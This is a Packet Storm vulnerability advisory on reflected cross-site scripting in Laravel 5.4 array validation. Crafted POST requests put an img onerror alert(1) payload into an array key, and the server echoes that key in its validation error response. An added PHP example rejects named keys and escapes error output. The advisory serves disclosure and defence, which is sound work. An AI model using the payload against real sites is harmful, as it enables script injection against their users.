Laravel 5.4 Cross Site Scripting

Type packetstorm
Reporter MaHDyfo
Modified 2017-03-07T00:00:00


# Exploit Title: Laravel non-persistent XSS in validation of arrays  
# Date: 06/03/2017  
# Exploit Author: MaHDyfo (mahdyfof[the at sign]  
# Vendor Homepage:  
# Version: 5.4  
In Laravel validation rules, assume that you set a rule that expects an array input.  
$this->validate($request, [  
'lessons' => 'required|array',  
'lessons.*' => 'numeric'  
]);  
Here we say that lessons should be an array and its elements should be numeric.  
Now let's enter a non-numeric character there to fail the validation.  
POST Request: lessons[]=1&lessons[]=4&lessons[]=abc  
Response: {"lessons.2":["The lessons.2 must be a number."]}  
That's OK up to here. But what if we supply our own key for the array element?  
POST Request: lessons[]=1&lessons[]=4&lessons[example]=abc  
Response: {"lessons.example":["The lessons.example must be a number."]}  
POST Request: lessons[]=1&lessons[]=4&lessons[<img src=x  
Response: {"lessons.<img src=x onerror='alert(1)'>":["The lessons.<img  
src=x onerror='alert(1)'> must be a number."]}  
And it executes the alert with no problem...  
You can see this bug already exists in the official Laravel docs:  
Maybe the solution is to validate the array values yourself, for  
example by extending the validation rules.
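
Added example, not part of the original advisory and not Laravel's own code: plain PHP that applies the suggestion above by refusing client-chosen array keys before validating, and HTML-escapes error keys and messages before they are rendered. The function names hasListKeys, validateLessons and escapeErrors are hypothetical, and the inputs are constructed from the requests shown above.

```php
<?php
// Added example, plain PHP (no framework). All function names are hypothetical.
// True only for keys 0..n-1, i.e. what lessons[]=... produces.
function hasListKeys(array $input): bool
{
    return array_keys($input) === array_keys(array_values($input));
}

// Numeric check in the spirit of the advisory's rules, but client-chosen
// keys are refused up front and never echoed into a message.
function validateLessons($lessons): array
{
    if (!is_array($lessons) || $lessons === []) {
        return ['lessons' => ['The lessons field must be a non-empty array.']];
    }
    if (!hasListKeys($lessons)) {
        return ['lessons' => ['The lessons field must not use named keys.']];
    }
    $errors = [];
    foreach ($lessons as $i => $value) {
        if (!is_numeric($value)) {
            $errors["lessons.$i"] = ["The lessons.$i must be a number."];
        }
    }
    return $errors;
}

// Second layer: HTML-escape keys and messages before they reach markup.
function escapeErrors(array $errors): array
{
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
    $safe = [];
    foreach ($errors as $key => $messages) {
        $safe[$esc((string) $key)] = array_map($esc, $messages);
    }
    return $safe;
}

// Constructed inputs: the advisory's three requests as PHP parses them.
$payload = "<img src=x onerror='alert(1)'>";
$cases = [
    'positional' => ['1', '4', 'abc'],
    'named key'  => ['1', '4', 'example' => 'abc'],
    'markup key' => ['1', '4', $payload => 'abc'],
];
foreach ($cases as $label => $lessons) {
    echo $label, ': ', json_encode(validateLessons($lessons)), PHP_EOL;
}
echo json_encode(escapeErrors(["lessons.$payload" => ["The lessons.$payload must be a number."]])), PHP_EOL;
```

Only the positional request yields a per-element error (lessons.2); both keyed requests get a generic message that contains no client-supplied text. The last line shows the advisory's error shape with the markup converted to HTML entities.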